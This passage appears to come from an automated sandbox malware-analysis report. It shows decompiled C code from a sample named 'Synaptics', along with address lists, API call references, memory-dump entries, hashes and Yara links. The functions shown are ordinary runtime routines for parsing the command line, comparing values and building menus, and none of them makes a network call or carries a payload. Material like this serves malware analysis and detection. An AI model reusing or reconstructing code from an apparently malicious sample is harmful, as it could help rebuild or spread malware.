							if(_t14 <= 0x20) {
								break;
							}
							if(_t14 != 0x22) {
								_t15 = CharNextA(_t23);
								if(_t15 <= _t23) {
									continue;
								} else {
									goto L27;
								}
								do {
									L27:
									 *((char*)(_t33 + _t35)) =  *_t23;
									_t23 =  &(_t23[1]);
									_t35 = _t35 + 1;
								} while (_t15 > _t23);
								continue;
							}
							_t23 = CharNextA(_t23);
							while(1) {
								_t17 =  *_t23;
								if(_t17 == 0 || _t17 == 0x22) {
									break;
								}
								_t19 = CharNextA(_t23);
								if(_t19 <= _t23) {
									continue;
								} else {
									goto L21;
								}
								do {
									L21:
									 *((char*)(_t33 + _t35)) =  *_t23;
									_t23 =  &(_t23[1]);
									_t35 = _t35 + 1;
								} while (_t19 > _t23);
							}
							if( *_t23 != 0) {
								_t23 = CharNextA(_t23);
							}
						}
						return _t23;
					} else {
						_t22 =  &(_t22[2]);
						continue;
					}
				}
			}



















                                                                                                                                                                                          0x00402a20
                                                                                                                                                                                          0x00402a22
                                                                                                                                                                                          0x00402a2e
                                                                                                                                                                                          0x00402a2e
                                                                                                                                                                                          0x00402a2e
                                                                                                                                                                                          0x00402a32
                                                                                                                                                                                          0x00402a2c
                                                                                                                                                                                          0x00402a2c
                                                                                                                                                                                          0x00402a2e
                                                                                                                                                                                          0x00402a2e
                                                                                                                                                                                          0x00402a32
                                                                                                                                                                                          0x00402a2c
                                                                                                                                                                                          0x00402a2c
                                                                                                                                                                                          0x00402a38
                                                                                                                                                                                          0x00402a3b
                                                                                                                                                                                          0x00402a48
                                                                                                                                                                                          0x00402a4a
                                                                                                                                                                                          0x00402a91
                                                                                                                                                                                          0x00402a91
                                                                                                                                                                                          0x00402a95
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00402a50
                                                                                                                                                                                          0x00402a84
                                                                                                                                                                                          0x00402a8d
                                                                                                                                                                                          0x00402a8f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00402a8f
                                                                                                                                                                                          0x00402a58
                                                                                                                                                                                          0x00402a6a
                                                                                                                                                                                          0x00402a6a
                                                                                                                                                                                          0x00402a6e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00402a5d
                                                                                                                                                                                          0x00402a66
                                                                                                                                                                                          0x00402a68
                                                                                                                                                                                          0x00402a68
                                                                                                                                                                                          0x00402a77
                                                                                                                                                                                          0x00402a7f
                                                                                                                                                                                          0x00402a7f
                                                                                                                                                                                          0x00402a77
                                                                                                                                                                                          0x00402a9b
                                                                                                                                                                                          0x00402aa0
                                                                                                                                                                                          0x00402aa2
                                                                                                                                                                                          0x00402aa4
                                                                                                                                                                                          0x00402af9
                                                                                                                                                                                          0x00402af9
                                                                                                                                                                                          0x00402afd
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00402aaa
                                                                                                                                                                                          0x00402ae5
                                                                                                                                                                                          0x00402aec
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00402aee
                                                                                                                                                                                          0x00402aee
                                                                                                                                                                                          0x00402af0
                                                                                                                                                                                          0x00402af3
                                                                                                                                                                                          0x00402af4
                                                                                                                                                                                          0x00402af5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00402aee
                                                                                                                                                                                          0x00402ab2
                                                                                                                                                                                          0x00402acb
                                                                                                                                                                                          0x00402acb
                                                                                                                                                                                          0x00402acf
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00402ab7
                                                                                                                                                                                          0x00402abe
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00402ac0
                                                                                                                                                                                          0x00402ac0
                                                                                                                                                                                          0x00402ac2
                                                                                                                                                                                          0x00402ac5
                                                                                                                                                                                          0x00402ac6
                                                                                                                                                                                          0x00402ac7
                                                                                                                                                                                          0x00402ac0
                                                                                                                                                                                          0x00402ad8
                                                                                                                                                                                          0x00402ae0
                                                                                                                                                                                          0x00402ae0
                                                                                                                                                                                          0x00402ad8
                                                                                                                                                                                          0x00402b05
                                                                                                                                                                                          0x00402a43
                                                                                                                                                                                          0x00402a43
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00402a43
                                                                                                                                                                                          0x00402a3b

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CharNextA.USER32(00000000,?,00000000,00000000,?,00402BAE), ref: 00402A53
                                                                                                                                                                                          • CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,00402BAE), ref: 00402A5D
                                                                                                                                                                                          • CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,00402BAE), ref: 00402A7A
                                                                                                                                                                                          • CharNextA.USER32(00000000,?,00000000,00000000,?,00402BAE), ref: 00402A84
                                                                                                                                                                                          • CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,00402BAE), ref: 00402AAD
                                                                                                                                                                                          • CharNextA.USER32(00000000,00000000,00000000,?,00000000,00000000,?,00402BAE), ref: 00402AB7
                                                                                                                                                                                          • CharNextA.USER32(00000000,00000000,00000000,?,00000000,00000000,?,00402BAE), ref: 00402ADB
                                                                                                                                                                                          • CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,00402BAE), ref: 00402AE5
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CharNext
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3213498283-0
                                                                                                                                                                                          • Opcode ID: f6c631b9bfbba0fccf281f579f268ce96caef945665294b9e62958ec9ed3533e
                                                                                                                                                                                          • Instruction ID: 7f4eabc370d0c2b1a65279813ceea620399496a62879659d683f8910f88fef49
                                                                                                                                                                                          • Opcode Fuzzy Hash: f6c631b9bfbba0fccf281f579f268ce96caef945665294b9e62958ec9ed3533e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3621E5447443D21ADF7169B90EC83A76B894B5A31872804BB9582B63CBDCFC48479B6E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004166D4 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 334COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 69%
                                                                                                                                                                                          			E004166D4(signed short* __eax, signed int __ecx, signed short* __edx, void* __edi, void* __fp0) {
				signed short* _v8;
				signed int _v12;
				char _v13;
				signed int _v16;
				signed int _v18;
				char _v24;
				void* _v28;
				signed int _v44;
				void* __ebp;
				signed short _t136;
				signed short* _t256;
				intOrPtr _t307;
				intOrPtr _t310;
				intOrPtr _t318;
				intOrPtr _t325;
				intOrPtr _t333;
				signed int _t338;
				void* _t346;
				void* _t348;
				intOrPtr _t349;

				_t353 = __fp0;
				_t346 = _t348;
				_t349 = _t348 + 0xffffffd8;
				_v12 = __ecx;
				_v8 = __edx;
				_t256 = __eax;
				_v13 = 1;
				_t338 =  *((intOrPtr*)(__eax));
				if((_t338 & 0x00000fff) >= 0x10f) {
					_t136 =  *_v8;
					if(_t136 != 0) {
						if(_t136 != 1) {
							_t53 =  &_v24; // 0x416b58
							if(E0041713C(_t338, _t53) != 0) {
								_push( &_v18);
								_t56 =  &_v24; // 0x416b58
								if( *((intOrPtr*)( *((intOrPtr*)( *_t56)) + 8))() == 0) {
									_t341 =  *_v8;
									if(( *_v8 & 0x00000fff) >= 0x10f) {
										if(E0041713C(_t341,  &_v28) != 0) {
											_push( &_v16);
											if( *((intOrPtr*)( *_v28 + 4))() == 0) {
												E0041024C(0xb);
												goto L46;
											} else {
												if( *_t256 == _v16) {
													_t129 = ( *((intOrPtr*)( *_v28 + 0x34))(_v12) & 0x0000007f) - 0x1c; // 0xc3ffff94
													_v13 =  *((intOrPtr*)(0x49b404 + _v12 * 2 + _t129));
													goto L46;
												} else {
													_push( &_v44);
													L0040F318();
													_push(_t346);
													_push(0x416ab5);
													_push( *[fs:eax]);
													 *[fs:eax] = _t349;
													_t268 = _v16 & 0x0000ffff;
													E00411330( &_v44, _v16 & 0x0000ffff, _t256, __edi, __fp0);
													if(_v44 != _v16) {
														E0041015C(_t268);
													}
													_t118 = ( *((intOrPtr*)( *_v28 + 0x34))(_v12) & 0x0000007f) - 0x1c; // 0xc3ffff94
													_v13 =  *((intOrPtr*)(0x49b404 + _v12 * 2 + _t118));
													_pop(_t307);
													 *[fs:eax] = _t307;
													_push(E00416AE8);
													return E004109E8( &_v44);
												}
											}
										} else {
											E0041024C(0xb);
											goto L46;
										}
									} else {
										_push( &_v44);
										L0040F318();
										_push(_t346);
										_push(0x4169ff);
										_push( *[fs:eax]);
										 *[fs:eax] = _t349;
										_t273 =  *_v8 & 0x0000ffff;
										E00411330( &_v44,  *_v8 & 0x0000ffff, _t256, __edi, __fp0);
										if( *_v8 != _v44) {
											E0041015C(_t273);
										}
										_v13 = E00416548( &_v44, _v12, _v8, _t353);
										_pop(_t310);
										 *[fs:eax] = _t310;
										_push(E00416AE8);
										return E004109E8( &_v44);
									}
								} else {
									if( *_v8 == _v18) {
										_t79 =  &_v24; // 0x416b58
										_t85 = ( *((intOrPtr*)( *((intOrPtr*)( *_t79)) + 0x34))(_v12) & 0x0000007f) - 0x1c; // 0xc3ffff94
										_v13 =  *((intOrPtr*)(0x49b404 + _v12 * 2 + _t85));
										goto L46;
									} else {
										_push( &_v44);
										L0040F318();
										_push(_t346);
										_push(0x41695d);
										_push( *[fs:eax]);
										 *[fs:eax] = _t349;
										_t278 = _v18 & 0x0000ffff;
										E00411330( &_v44, _v18 & 0x0000ffff, _v8, __edi, __fp0);
										if(_v44 != _v18) {
											E0041015C(_t278);
										}
										_t68 =  &_v24; // 0x416b58
										_t74 = ( *((intOrPtr*)( *((intOrPtr*)( *_t68)) + 0x34))(_v12) & 0x0000007f) - 0x1c; // 0xc3ffff94
										_v13 =  *((intOrPtr*)(0x49b404 + _v12 * 2 + _t74));
										_pop(_t318);
										 *[fs:eax] = _t318;
										_push(E00416AE8);
										return E004109E8( &_v44);
									}
								}
							} else {
								E0041024C(__ecx);
								goto L46;
							}
						} else {
							_v13 = E00416328(_v12, 2);
							goto L46;
						}
					} else {
						_v13 = E00416314(0, 1);
						goto L46;
					}
				} else {
					if(_t338 != 0) {
						if(_t338 != 1) {
							if(E0041713C( *_v8,  &_v28) != 0) {
								_push( &_v16);
								if( *((intOrPtr*)( *_v28 + 4))() == 0) {
									_push( &_v44);
									L0040F318();
									_push(_t346);
									_push(0x41686d);
									_push( *[fs:eax]);
									 *[fs:eax] = _t349;
									_t284 =  *_t256 & 0x0000ffff;
									E00411330( &_v44,  *_t256 & 0x0000ffff, _v8, __edi, __fp0);
									if((_v44 & 0x00000fff) !=  *_t256) {
										E0041015C(_t284);
									}
									_v13 = E00416548(_t256, _v12,  &_v44, _t353);
									_pop(_t325);
									 *[fs:eax] = _t325;
									_push(E00416AE8);
									return E004109E8( &_v44);
								} else {
									if( *_t256 == _v16) {
										_t38 = ( *((intOrPtr*)( *_v28 + 0x34))(_v12) & 0x0000007f) - 0x1c; // 0xc3ffff94
										_v13 =  *((intOrPtr*)(0x49b404 + _v12 * 2 + _t38));
										goto L46;
									} else {
										_push( &_v44);
										L0040F318();
										_push(_t346);
										_push(0x4167df);
										_push( *[fs:eax]);
										 *[fs:eax] = _t349;
										_t289 = _v16 & 0x0000ffff;
										E00411330( &_v44, _v16 & 0x0000ffff, _t256, __edi, __fp0);
										if((_v44 & 0x00000fff) != _v16) {
											E0041015C(_t289);
										}
										_t27 = ( *((intOrPtr*)( *_v28 + 0x34))(_v12) & 0x0000007f) - 0x1c; // 0xc3ffff94
										_v13 =  *((intOrPtr*)(0x49b404 + _v12 * 2 + _t27));
										_pop(_t333);
										 *[fs:eax] = _t333;
										_push(E00416AE8);
										return E004109E8( &_v44);
									}
								}
							} else {
								E0041024C(__ecx);
								goto L46;
							}
						} else {
							_v13 = E00416328(_v12, 0);
							goto L46;
						}
					} else {
						_v13 = E00416314(1, 0);
						L46:
						return _v13;
					}
				}
			}























                                                                                                                                                                                          0x004166d4
                                                                                                                                                                                          0x004166d5
                                                                                                                                                                                          0x004166d7
                                                                                                                                                                                          0x004166dc
                                                                                                                                                                                          0x004166df
                                                                                                                                                                                          0x004166e2
                                                                                                                                                                                          0x004166e4
                                                                                                                                                                                          0x004166e8
                                                                                                                                                                                          0x004166f5
                                                                                                                                                                                          0x00416877
                                                                                                                                                                                          0x0041687d
                                                                                                                                                                                          0x00416897
                                                                                                                                                                                          0x004168ad
                                                                                                                                                                                          0x004168b9
                                                                                                                                                                                          0x004168c8
                                                                                                                                                                                          0x004168d1
                                                                                                                                                                                          0x004168db
                                                                                                                                                                                          0x00416991
                                                                                                                                                                                          0x0041699e
                                                                                                                                                                                          0x00416a15
                                                                                                                                                                                          0x00416a24
                                                                                                                                                                                          0x00416a36
                                                                                                                                                                                          0x00416ae3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00416a3c
                                                                                                                                                                                          0x00416a43
                                                                                                                                                                                          0x00416ada
                                                                                                                                                                                          0x00416ade
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00416a45
                                                                                                                                                                                          0x00416a48
                                                                                                                                                                                          0x00416a49
                                                                                                                                                                                          0x00416a50
                                                                                                                                                                                          0x00416a51
                                                                                                                                                                                          0x00416a56
                                                                                                                                                                                          0x00416a59
                                                                                                                                                                                          0x00416a5c
                                                                                                                                                                                          0x00416a65
                                                                                                                                                                                          0x00416a72
                                                                                                                                                                                          0x00416a74
                                                                                                                                                                                          0x00416a74
                                                                                                                                                                                          0x00416a98
                                                                                                                                                                                          0x00416a9c
                                                                                                                                                                                          0x00416aa1
                                                                                                                                                                                          0x00416aa4
                                                                                                                                                                                          0x00416aa7
                                                                                                                                                                                          0x00416ab4
                                                                                                                                                                                          0x00416ab4
                                                                                                                                                                                          0x00416a43
                                                                                                                                                                                          0x00416a17
                                                                                                                                                                                          0x00416a17
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00416a17
                                                                                                                                                                                          0x004169a0
                                                                                                                                                                                          0x004169a3
                                                                                                                                                                                          0x004169a4
                                                                                                                                                                                          0x004169ab
                                                                                                                                                                                          0x004169ac
                                                                                                                                                                                          0x004169b1
                                                                                                                                                                                          0x004169b4
                                                                                                                                                                                          0x004169ba
                                                                                                                                                                                          0x004169c2
                                                                                                                                                                                          0x004169d1
                                                                                                                                                                                          0x004169d3
                                                                                                                                                                                          0x004169d3
                                                                                                                                                                                          0x004169e6
                                                                                                                                                                                          0x004169eb
                                                                                                                                                                                          0x004169ee
                                                                                                                                                                                          0x004169f1
                                                                                                                                                                                          0x004169fe
                                                                                                                                                                                          0x004169fe
                                                                                                                                                                                          0x004168e1
                                                                                                                                                                                          0x004168eb
                                                                                                                                                                                          0x0041696d
                                                                                                                                                                                          0x00416982
                                                                                                                                                                                          0x00416986
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004168ed
                                                                                                                                                                                          0x004168f0
                                                                                                                                                                                          0x004168f1
                                                                                                                                                                                          0x004168f8
                                                                                                                                                                                          0x004168f9
                                                                                                                                                                                          0x004168fe
                                                                                                                                                                                          0x00416901
                                                                                                                                                                                          0x00416904
                                                                                                                                                                                          0x0041690e
                                                                                                                                                                                          0x0041691b
                                                                                                                                                                                          0x0041691d
                                                                                                                                                                                          0x0041691d
                                                                                                                                                                                          0x0041692b
                                                                                                                                                                                          0x00416940
                                                                                                                                                                                          0x00416944
                                                                                                                                                                                          0x00416949
                                                                                                                                                                                          0x0041694c
                                                                                                                                                                                          0x0041694f
                                                                                                                                                                                          0x0041695c
                                                                                                                                                                                          0x0041695c
                                                                                                                                                                                          0x004168eb
                                                                                                                                                                                          0x004168bb
                                                                                                                                                                                          0x004168bb
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004168bb
                                                                                                                                                                                          0x00416899
                                                                                                                                                                                          0x004168a5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004168a5
                                                                                                                                                                                          0x0041687f
                                                                                                                                                                                          0x00416888
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00416888
                                                                                                                                                                                          0x004166fb
                                                                                                                                                                                          0x004166fe
                                                                                                                                                                                          0x00416715
                                                                                                                                                                                          0x0041673b
                                                                                                                                                                                          0x0041674a
                                                                                                                                                                                          0x0041675c
                                                                                                                                                                                          0x00416813
                                                                                                                                                                                          0x00416814
                                                                                                                                                                                          0x0041681b
                                                                                                                                                                                          0x0041681c
                                                                                                                                                                                          0x00416821
                                                                                                                                                                                          0x00416824
                                                                                                                                                                                          0x00416827
                                                                                                                                                                                          0x00416830
                                                                                                                                                                                          0x00416840
                                                                                                                                                                                          0x00416842
                                                                                                                                                                                          0x00416842
                                                                                                                                                                                          0x00416854
                                                                                                                                                                                          0x00416859
                                                                                                                                                                                          0x0041685c
                                                                                                                                                                                          0x0041685f
                                                                                                                                                                                          0x0041686c
                                                                                                                                                                                          0x00416762
                                                                                                                                                                                          0x00416769
                                                                                                                                                                                          0x00416804
                                                                                                                                                                                          0x00416808
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0041676b
                                                                                                                                                                                          0x0041676e
                                                                                                                                                                                          0x0041676f
                                                                                                                                                                                          0x00416776
                                                                                                                                                                                          0x00416777
                                                                                                                                                                                          0x0041677c
                                                                                                                                                                                          0x0041677f
                                                                                                                                                                                          0x00416782
                                                                                                                                                                                          0x0041678b
                                                                                                                                                                                          0x0041679c
                                                                                                                                                                                          0x0041679e
                                                                                                                                                                                          0x0041679e
                                                                                                                                                                                          0x004167c2
                                                                                                                                                                                          0x004167c6
                                                                                                                                                                                          0x004167cb
                                                                                                                                                                                          0x004167ce
                                                                                                                                                                                          0x004167d1
                                                                                                                                                                                          0x004167de
                                                                                                                                                                                          0x004167de
                                                                                                                                                                                          0x00416769
                                                                                                                                                                                          0x0041673d
                                                                                                                                                                                          0x0041673d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0041673d
                                                                                                                                                                                          0x00416717
                                                                                                                                                                                          0x00416723
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00416723
                                                                                                                                                                                          0x00416700
                                                                                                                                                                                          0x00416709
                                                                                                                                                                                          0x00416ae8
                                                                                                                                                                                          0x00416af0
                                                                                                                                                                                          0x00416af0
                                                                                                                                                                                          0x004166fe

                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: XkA
                                                                                                                                                                                          • API String ID: 0-440165744
                                                                                                                                                                                          • Opcode ID: 33095617600c0f76cb91287695ca0870e369363d944ea869185c57052bf95faf
                                                                                                                                                                                          • Instruction ID: 126fbda12782d38e062267a272fec00c664f0fd244103826fb372783f4e2cac9
                                                                                                                                                                                          • Opcode Fuzzy Hash: 33095617600c0f76cb91287695ca0870e369363d944ea869185c57052bf95faf
                                                                                                                                                                                          • Instruction Fuzzy Hash: A0D18339A00149AFCF00EF94C4819EEBBB5EF49314F5544AAE840B7355D638EEC6CB69
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0044A960 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 187windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 87%
                                                                                                                                                                                          			E0044A960(void* __eax, void* __ebx, char __ecx, struct HMENU__* __edx, void* __edi, void* __esi) {
				char _v5;
				char _v12;
				char _v13;
				struct tagMENUITEMINFOA _v61;
				char _v68;
				intOrPtr _t103;
				CHAR* _t109;
				char _t115;
				short _t149;
				void* _t154;
				intOrPtr _t161;
				intOrPtr _t184;
				struct HMENU__* _t186;
				int _t190;
				void* _t192;
				intOrPtr _t193;
				void* _t196;
				void* _t205;

				_t155 = __ecx;
				_v68 = 0;
				_v12 = 0;
				_v5 = __ecx;
				_t186 = __edx;
				_t154 = __eax;
				_push(_t196);
				_push(0x44abbb);
				_push( *[fs:eax]);
				 *[fs:eax] = _t196 + 0xffffffc0;
				if( *((char*)(__eax + 0x3e)) == 0) {
					L22:
					_pop(_t161);
					 *[fs:eax] = _t161;
					_push(0x44abc2);
					E004049C0( &_v68);
					return E004049C0( &_v12);
				}
				E00404A58( &_v12,  *((intOrPtr*)(__eax + 0x30)));
				if(E0044C8DC(_t154) <= 0) {
					__eflags =  *((short*)(_t154 + 0x60));
					if( *((short*)(_t154 + 0x60)) == 0) {
						L8:
						if((GetVersion() & 0x000000ff) < 4) {
							_t190 =  *(0x49bdf0 + ((E00404DCC( *((intOrPtr*)(_t154 + 0x30)), 0x44abe0) & 0xffffff00 | __eflags == 0x00000000) & 0x0000007f) * 4) |  *0x0049BDE4 |  *0x0049BDD4 |  *0x0049BDDC | 0x00000400;
							_t103 = E0044C8DC(_t154);
							__eflags = _t103;
							if(_t103 <= 0) {
								InsertMenuA(_t186, 0xffffffff, _t190,  *(_t154 + 0x50) & 0x0000ffff, E00404E80(_v12));
							} else {
								_t109 = E00404E80( *((intOrPtr*)(_t154 + 0x30)));
								InsertMenuA(_t186, 0xffffffff, _t190 | 0x00000010, E0044AE70(_t154), _t109);
							}
							goto L22;
						}
						_v61.cbSize = 0x2c;
						_v61.fMask = 0x3f;
						_t192 = E0044CE98(_t154);
						if(_t192 == 0 ||  *((char*)(_t192 + 0x40)) == 0 && E0044C4B4(_t154) == 0) {
							if( *((intOrPtr*)(_t154 + 0x4c)) == 0) {
								L14:
								_t115 = 0;
								goto L16;
							}
							_t205 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x4c)))) + 0x1c))();
							if(_t205 == 0) {
								goto L15;
							}
							goto L14;
						} else {
							L15:
							_t115 = 1;
							L16:
							_v13 = _t115;
							_v61.fType =  *(0x49be24 + ((E00404DCC( *((intOrPtr*)(_t154 + 0x30)), 0x44abe0) & 0xffffff00 | _t205 == 0x00000000) & 0x0000007f) * 4) |  *0x0049BE1C |  *0x0049BDF8 |  *0x0049BE2C |  *0x0049BE34;
							_v61.fState =  *0x0049BE04 |  *0x0049BE14 |  *0x0049BE0C;
							_v61.wID =  *(_t154 + 0x50) & 0x0000ffff;
							_v61.hSubMenu = 0;
							_v61.hbmpChecked = 0;
							_v61.hbmpUnchecked = 0;
							_v61.dwTypeData = E00404E80(_v12);
							if(E0044C8DC(_t154) > 0) {
								_v61.hSubMenu = E0044AE70(_t154);
							}
							InsertMenuItemA(_t186, 0xffffffff, 0xffffffff,  &_v61);
							goto L22;
						}
					}
					_t193 =  *((intOrPtr*)(_t154 + 0x64));
					__eflags = _t193;
					if(_t193 == 0) {
						L7:
						_push(_v12);
						_push(0x44abd4);
						E00449FC4( *((intOrPtr*)(_t154 + 0x60)), _t154, _t155,  &_v68, _t193);
						_push(_v68);
						E00404D40();
						goto L8;
					}
					__eflags =  *((intOrPtr*)(_t193 + 0x64));
					if( *((intOrPtr*)(_t193 + 0x64)) != 0) {
						goto L7;
					}
					_t184 =  *0x449854; // 0x4498a0
					_t149 = E00403D78( *((intOrPtr*)(_t193 + 4)), _t184);
					__eflags = _t149;
					if(_t149 != 0) {
						goto L8;
					}
					goto L7;
				}
				_v61.hSubMenu = E0044AE70(_t154);
				goto L8;
			}





















                                                                                                                                                                                          0x0044a960
                                                                                                                                                                                          0x0044a96b
                                                                                                                                                                                          0x0044a96e
                                                                                                                                                                                          0x0044a971
                                                                                                                                                                                          0x0044a974
                                                                                                                                                                                          0x0044a976
                                                                                                                                                                                          0x0044a97a
                                                                                                                                                                                          0x0044a97b
                                                                                                                                                                                          0x0044a980
                                                                                                                                                                                          0x0044a983
                                                                                                                                                                                          0x0044a98a
                                                                                                                                                                                          0x0044ab9d
                                                                                                                                                                                          0x0044ab9f
                                                                                                                                                                                          0x0044aba2
                                                                                                                                                                                          0x0044aba5
                                                                                                                                                                                          0x0044abad
                                                                                                                                                                                          0x0044abba
                                                                                                                                                                                          0x0044abba
                                                                                                                                                                                          0x0044a996
                                                                                                                                                                                          0x0044a9a4
                                                                                                                                                                                          0x0044a9b2
                                                                                                                                                                                          0x0044a9b7
                                                                                                                                                                                          0x0044a9fc
                                                                                                                                                                                          0x0044aa0a
                                                                                                                                                                                          0x0044ab56
                                                                                                                                                                                          0x0044ab5e
                                                                                                                                                                                          0x0044ab63
                                                                                                                                                                                          0x0044ab65
                                                                                                                                                                                          0x0044ab98
                                                                                                                                                                                          0x0044ab67
                                                                                                                                                                                          0x0044ab6a
                                                                                                                                                                                          0x0044ab7f
                                                                                                                                                                                          0x0044ab7f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0044ab65
                                                                                                                                                                                          0x0044aa10
                                                                                                                                                                                          0x0044aa17
                                                                                                                                                                                          0x0044aa25
                                                                                                                                                                                          0x0044aa29
                                                                                                                                                                                          0x0044aa40
                                                                                                                                                                                          0x0044aa4e
                                                                                                                                                                                          0x0044aa4e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0044aa4e
                                                                                                                                                                                          0x0044aa4a
                                                                                                                                                                                          0x0044aa4c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0044aa52
                                                                                                                                                                                          0x0044aa52
                                                                                                                                                                                          0x0044aa52
                                                                                                                                                                                          0x0044aa54
                                                                                                                                                                                          0x0044aa54
                                                                                                                                                                                          0x0044aaa3
                                                                                                                                                                                          0x0044aaca
                                                                                                                                                                                          0x0044aad1
                                                                                                                                                                                          0x0044aad6
                                                                                                                                                                                          0x0044aadb
                                                                                                                                                                                          0x0044aae0
                                                                                                                                                                                          0x0044aaeb
                                                                                                                                                                                          0x0044aaf7
                                                                                                                                                                                          0x0044ab00
                                                                                                                                                                                          0x0044ab00
                                                                                                                                                                                          0x0044ab0c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0044ab0c
                                                                                                                                                                                          0x0044aa29
                                                                                                                                                                                          0x0044a9b9
                                                                                                                                                                                          0x0044a9bc
                                                                                                                                                                                          0x0044a9be
                                                                                                                                                                                          0x0044a9d8
                                                                                                                                                                                          0x0044a9d8
                                                                                                                                                                                          0x0044a9db
                                                                                                                                                                                          0x0044a9e7
                                                                                                                                                                                          0x0044a9ec
                                                                                                                                                                                          0x0044a9f7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0044a9f7
                                                                                                                                                                                          0x0044a9c0
                                                                                                                                                                                          0x0044a9c4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0044a9c9
                                                                                                                                                                                          0x0044a9cf
                                                                                                                                                                                          0x0044a9d4
                                                                                                                                                                                          0x0044a9d6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0044a9d6
                                                                                                                                                                                          0x0044a9ad
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • InsertMenuItemA.USER32(?,000000FF,000000FF,0000002C), ref: 0044AB0C
                                                                                                                                                                                          • GetVersion.KERNEL32(00000000,0044ABBB), ref: 0044A9FC
                                                                                                                                                                                            • Part of subcall function 0044AE70: CreatePopupMenu.USER32(?,0044AB77,00000000,00000000,0044ABBB), ref: 0044AE8B
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
